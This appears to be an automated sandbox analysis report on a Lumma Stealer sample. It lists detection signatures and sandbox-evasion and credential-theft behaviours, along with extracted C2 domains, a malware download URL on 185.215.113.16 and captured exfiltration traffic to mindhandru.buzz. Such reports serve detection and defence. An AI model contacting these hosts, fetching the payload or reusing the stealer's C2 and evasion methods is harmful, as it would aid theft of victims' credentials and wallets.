Windows Analysis Report
0zBsv1tnt4.exe

Overview

General Information

Sample name: 0zBsv1tnt4.exe
renamed because original name is a hash value
Original sample name: 27e0a573048fadb3dd4b3b2454c8eda5.exe
Analysis ID: 1580958
MD5: 27e0a573048fadb3dd4b3b2454c8eda5
SHA1: c841c7fd14f4982e37aed56b25c0d748902fa9e2
SHA256: 6d6884e9912854c20c4dea409280402b3e27a0448407ad7f37c3fb642ee60525
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

Source: 0zBsv1tnt4.exe Avira: detected
Source: 0zBsv1tnt4.exe.1868.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "inherineau.buzz", "hummskitnj.buzz", "mindhandru.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "scentniej.buzz"], "Build id": "LOGS11--LiveTraffic"}
Source: 0zBsv1tnt4.exe Virustotal: Detection: 52% Perma Link
Source: 0zBsv1tnt4.exe ReversingLabs: Detection: 57%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0zBsv1tnt4.exe Joe Sandbox ML: detected
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: hummskitnj.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: appliacnesot.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: screwamusresz.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: inherineau.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: scentniej.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: rebuildeso.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: prisonyfork.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: mindhandru.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String decryptor: LOGS11--LiveTraffic
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009658D5 CryptUnprotectData, 0_2_009658D5
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: 0zBsv1tnt4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0zBsv1tnt4.exe, 00000000.00000002.1877383452.0000000006512000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov word ptr [eax], cx 0_2_00971A10
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, byte ptr [edx+eax] 0_2_00973B50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h 0_2_00990340
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0097D34A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov eax, ebx 0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h] 0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov edi, dword ptr [esi+30h] 0_2_0095CC7A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h] 0_2_00990D20
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov edx, ebx 0_2_00958600
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov ecx, eax 0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then jmp edx 0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, byte ptr [edx+eax] 0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h] 0_2_00991720
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov eax, ebx 0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh] 0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah] 0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh] 0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov ecx, eax 0_2_0096D8AC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov esi, ecx 0_2_009790D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0097E0DA
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov ecx, eax 0_2_0096D8D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov edx, ecx 0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0097C0E6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then push esi 0_2_0095C805
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h 0_2_00972830
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h] 0_2_0098C830
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_0097C850
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h 0_2_0098C990
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_0097B980
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then jmp edx 0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, byte ptr [edx+eax] 0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h 0_2_009781CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h 0_2_009789E9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov ecx, eax 0_2_0097D116
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 0_2_0097B170
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov ecx, eax 0_2_0097D17D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h] 0_2_00991160
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov eax, dword ptr [00996130h] 0_2_00968169
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 0_2_0097AAC0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 0_2_00986210
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then lea esi, dword ptr [eax+00000270h] 0_2_00958A50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h 0_2_0098CA40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh] 0_2_0096EB80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h 0_2_009783D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov edx, ecx 0_2_00968B1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov ecx, eax 0_2_0096C300
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah] 0_2_0095AB40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h 0_2_00964CA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov word ptr [eax], cx 0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov word ptr [edx], di 0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh] 0_2_0097C465
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0097C465
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov edi, ecx 0_2_0097A5B6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h] 0_2_0098EDC1
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh 0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh] 0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh 0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h 0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0097DDFF
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov edx, ecx 0_2_00976D2E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h 0_2_00978528
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then dec edx 0_2_0098FD70
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h] 0_2_0096B57D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov edx, ecx 0_2_00979E80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h] 0_2_009906F0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0097DE07
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then dec edx 0_2_0098FE00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov dword ptr [esp+20h], eax 0_2_00959780
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then jmp edx 0_2_009737D6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov ecx, eax 0_2_0097BF13
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov edi, dword ptr [esp+28h] 0_2_00975F1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then jmp eax 0_2_00979739
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then mov word ptr [eax], cx 0_2_00966F52
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] 0_2_00977740

Networking

Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49714 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49706 -> 104.21.11.101:443
Source: Malware configuration extractor URLs: prisonyfork.buzz
Source: Malware configuration extractor URLs: appliacnesot.buzz
Source: Malware configuration extractor URLs: screwamusresz.buzz
Source: Malware configuration extractor URLs: inherineau.buzz
Source: Malware configuration extractor URLs: hummskitnj.buzz
Source: Malware configuration extractor URLs: mindhandru.buzz
Source: Malware configuration extractor URLs: rebuildeso.buzz
Source: Malware configuration extractor URLs: cashfuzysao.buzz
Source: Malware configuration extractor URLs: scentniej.buzz
Source: global traffic HTTP traffic detected:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 26 Dec 2024 13:14:49 GMT
    Content-Type: application/octet-stream
    Content-Length: 2868736
    Last-Modified: Thu, 26 Dec 2024 12:23:49 GMT
    Connection: keep-alive
    ETag: "676d4ad5-2bc600"
    Accept-Ranges: bytes
Source: Joe Sandbox View IP Address: 185.215.113.16
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: Joe Sandbox View IP Address: 104.21.11.101
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.11.101:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49715 -> 185.215.113.16:80
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected:
    GET /scripts/c/ms.jsll-4.min.js HTTP/1.1
    Host: js.monitor.azure.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Referer: https://learn.microsoft.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /off/def.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: 185.215.113.16
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: global traffic DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic DNS traffic detected: DNS query: mdec.nelreports.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
Source: 0zBsv1tnt4.exe String found in binary or memory: http://185.215.113.16/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/O
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeGd
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeSd
Source: 0zBsv1tnt4.exe, 00000000.00000002.1870836699.00000000010FA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeeWebKit/537.36
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/z
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686542592.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643183119.00000000014CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft2_
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_112.6.dr String found in binary or memory: http://schema.org/Organization
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_112.6.dr, chromecache_89.6.dr, chromecache_122.6.dr String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_112.6.dr String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_112.6.dr String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_112.6.dr String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_121.6.dr, chromecache_101.6.dr String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
